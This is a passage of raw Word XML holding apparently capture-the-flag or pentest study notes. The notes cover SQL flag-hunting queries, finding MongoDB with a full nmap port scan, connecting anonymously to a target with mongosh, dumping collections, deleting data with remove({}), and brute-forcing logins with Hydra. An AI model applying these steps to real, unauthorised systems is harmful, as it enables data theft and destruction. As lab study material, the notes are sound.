      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the WHERE clause to filter rows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; WHERE &lt;column&gt; = '&lt;value&gt;';</w:t>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t xml:space="preserve">4. Count Rows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COUNT(*) FROM &lt;table_name&gt;;</w:t>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t xml:space="preserve">5. Check for Flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM flags;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; WHERE &lt;column&gt; LIKE '%flag%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A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B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o7tl24r61aob" w:id="221"/>
      <w:bookmarkEnd w:id="221"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MongoDB</w:t>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t xml:space="preserve">Usually found on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27017</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you will have to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan all ports to find it</w:t>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t xml:space="preserve">Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ABF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Collections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Documents (key and value)</w:t>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t xml:space="preserve">We need to download the MongoDB shell utility:</w:t>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t xml:space="preserve">Downloading the following tar archive file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O https://downloads.mongodb.com/compass/mongosh-2.3.2-linux-x64.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -O option in curl stands for "remote file output", and it tells curl to save the downloaded file with its original name from the URL.</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AC9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must then extract the contents of the tar archive file using the tar utility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar xvf mongosh-2.3.2-linux-x64.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the location where the mongosh binary is present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/mongosh-2.3.2-linux-x64/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ACF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's now try to connect to the MongoDB server running on the remote host as an anonymous user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./mongosh mongodb://{target_IP}:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the MongoDB Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If MongoDB is running on the target and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">27017</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is open:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the location where the mongosh binary is present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/mongosh-2.3.2-linux-x64/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect to MongoDB using the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./mongosh mongodb://{target_IP}:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ADF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a specific database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="984"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use &lt;database-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all collections (tables) in the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="729"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show collections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Query data in a collection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.find()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.find().pretty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this if you want format the output to make it easier to read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify or delete data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.insert({key: "value"})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.remove({})</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If authentication is enabled, brute-force credentials using tools like `Hydra`:</w:t>
      </w:r>
    </w:p>
